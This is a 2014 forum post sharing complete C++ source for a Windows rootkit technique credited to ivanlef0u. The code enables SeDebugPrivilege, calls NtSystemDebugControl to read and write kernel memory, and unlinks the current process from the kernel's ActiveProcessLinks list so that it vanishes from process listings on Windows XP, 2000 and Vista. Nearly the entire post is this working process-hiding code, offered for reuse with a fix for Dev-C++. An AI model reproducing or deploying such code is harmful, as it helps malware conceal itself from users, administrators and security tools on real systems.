JMC31337 Posted January 1, 2014 Posted January 1, 2014 (edited) in no way is this my code at all:simply added/modify 2 lines to make it work correctly for Dev-C++ 1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl"); #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> #include <shlwapi.h> #include <iostream> using namespace std; typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) //ivanlef0u's code //xp sp2 ntoskrnl 5.1.2600, les chiffre indiquent la taille de la struct à passer en argument typedef enum _DEBUG_CONTROL_CODE { DebugSysGetTraceInformation=1, DebugSysSetInternalBreakpoint, //0x38 DebugSysSetSpecialCall, //0x4 DebugSysClerSpecialCalls, //no args kill all special calls DebugSysQuerySpecialCalls, DebugSysBreakpointWithStatus, DebugSysGetVersion, //0x28 //sources de reactos écrit par notre alex ionescu préféré ntexapi.h DebugSysReadVirtual = 8, //0x10 DebugSysWriteVirtual = 9, DebugSysReadPhysical = 10, DebugSysWritePhysical = 11, DebugSysReadControlSpace=12, //0x18 DebugSysWriteControlSpace, //0x18 DebugSysReadIoSpace, //0x20 DebugSysSysWriteIoSpace, //0x20 DebugSysReadMsr, //0x10 DebugSysWriteMsr, //0x10 DebugSysReadBusData, //0x18 DebugSysWriteBusData, //0x18 DebugSysCheckLowMemory, } DEBUG_CONTROL_CODE; typedef struct _SYSDBG_VIRTUAL { PVOID Address; PVOID Buffer; ULONG Request; } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; extern "C" __declspec(dllimport) ULONG __stdcall RtlNtStatusToDosError( NTSTATUS Status ); #define PKPCR 0xffdff000 // <=> fs:[0] in KeLand //FUNCTIONS: LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*); //Check OS and get the right Offset: int CheckOSVersion( int &Offset ) { //xWeasel's Code for checking OS's and setting the right Offset OSVERSIONINFO osvi; ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&osvi); if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) { Offset = 0x88; //WinXP return 1; } else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0) { Offset = 0xA0; //Win2000 return 1; } else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) { Offset = 0xA0; //VISTA return 1; } else { return 0; } return 0; } ULONG EnablePrivilege(char *Privilege) { HANDLE hToken; ULONG Ret=1; TOKEN_PRIVILEGES TP; LUID Luid; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { Ret=0; goto bye; } if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid)) { Ret=0; goto bye; } TP.PrivilegeCount=1; TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, false, &TP, NULL, NULL, NULL)) { Ret=0; goto bye; } bye: CloseHandle(hToken); return Ret; } int HideCurrentProcess( int Offset ) { *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl"); ULONG Status, Addr, PrevEPROCESS, NextEPROCESS; SYSDBG_VIRTUAL Mem; if(!EnablePrivilege("SeDebugPrivilege")) { return 0; } /**************** CURRENT ETHREAD ****************/ Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD Mem.Buffer=&Addr; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** CURRENT EPROCESS ****************/ Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS Mem.Buffer=&Addr; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** PREV EPROCESS ****************/ Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&PrevEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** NEXT EPROCESS ****************/ Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&NextEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** PREV EPROCESS TO NEXT EPROCESS ****************/ Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&NextEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } /**************** NEXT EPROCESS TO PREV EPROCESS ****************/ Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY Mem.Buffer=&PrevEPROCESS; Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL); if(Status!=STATUS_SUCCESS) { return 0; } return 1; //SUCCED Stuff is hidden!! } //MAIN FUNCTION int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG int Offset; if ( CheckOSVersion(Offset) == 1) { HideCurrentProcess(Offset);//OK to hide MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG } return 0; }the original idea was by a bad @ss hacker ivanlef0u http://www.ivanlef0u.tuxfamily.org/ --Currently works under SP3 Edited January 1, 2014 by JMC31337 2
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now